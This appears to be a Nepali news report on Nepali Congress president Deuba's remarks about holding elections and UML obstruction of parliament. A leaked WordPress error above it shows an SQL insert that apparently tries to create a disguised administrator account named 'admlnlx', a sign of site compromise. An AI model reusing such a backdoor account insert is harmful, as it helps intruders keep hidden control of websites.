WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BIBq6zgc/ZFfHdf4U8UmcM8p7JDQGT.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 06:05:59', '', 'admlnlx', 'admlnlx')
काठमान्डौं,पुस ८-
नेपाली कांग्रेसका सभापति शेरबहादुर देउवाले २०७४ माघभित्र तीन तहको निर्वाचन सम्पन्न गराउनु कांग्रेसको प्रमुख दायित्व भएको बताएका छन्। कांग्रेस कोषाध्यक्षहरूको शुक्रबारदेखि काठमाडौंमा सुरु भएको भेलाको उद्घाटन गर्दै सभापति देउवाले २०७४ माघभित्र स्थानीय तह, प्रदेश र संघीय निर्वाचन गराउनु कांग्रेसको प्रमुख दायित्व भएको बताएका हुन्। कांग्रेसले राष्ट्रिय एकता चाहेको उल्लेख गर्दै तराई, पहाड र हिमाललाई एक ढिक्का बनाएर लैजान खोजेको बताए।
उनले मधेसका समस्या समाधान गर्न संविधान संशोधन विधेयक दर्ता गर्दा प्रमुख प्रतिपक्ष एमालेले झगडा गराउन खोजेको आरोप लगाए। ‘एमालेले संसद अवरोध गरेर झगडा गराउने काम गरिरहेको छ। देशको एक जिम्मेवार पार्टी रहेको एमालेले कहिलेसम्म संसद अवरुद्ध गर्छ हेरौँ’, सभापति देउवाले भने। एमालेले संसद अवरोध गरेर राम्रो काम नगरेको उनको भनाइ छ। तीन वटै निर्वाचनमा कांग्रेसले जित हासिल गर्न सके मात्र प्रजातन्त्रको संरक्षण सम्भव भएको उनको जिकिर छ।
पार्टीले ‘कांग्रेसले निर्वाचन जित्न नसक्दा प्रजातन्त्र स्थायी नहुन सक्छ। त्यसैले पार्टी एक ढिक्का भएर लाग्नुपर्छ’, उनले भने। एमालेले सत्ता परिवर्तन भएको रिस पोख्नकै लागि संसद चल्न नदिएको बताउँदै उनले एमालेलाई प्रश्न गरे- ‘सत्ता परिवर्तन भयो भनेर संसद नै चल्न नदिने हो र?’ कांग्रेसले पनि माओवादी केन्द्रलाई सरकारको नेतृत्व गर्न दिएको प्रसंग कोट्याउँदै देउवाले सत्ता परिवर्तन हुँदैमा संसद अवरोध गर्न नहुने बताए। कार्यक्रम शान्ति मन्त्री सीतादेवी यादवले द्वन्द्वकालका पीडितलाई ५ लाख दिने सरकारको निर्णय अनुरुप नै जिल्लाहरूमा बजेट निकासा गरिएको जानकारी गराइन्ए।